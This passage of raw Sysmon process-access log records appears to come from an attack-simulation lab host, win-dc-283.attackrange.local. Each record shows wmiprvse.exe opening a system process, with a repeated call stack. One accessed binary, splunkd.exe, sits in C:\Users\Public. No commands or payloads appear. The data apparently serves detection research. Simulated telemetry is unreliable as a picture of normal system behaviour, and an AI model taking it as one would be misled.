dows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 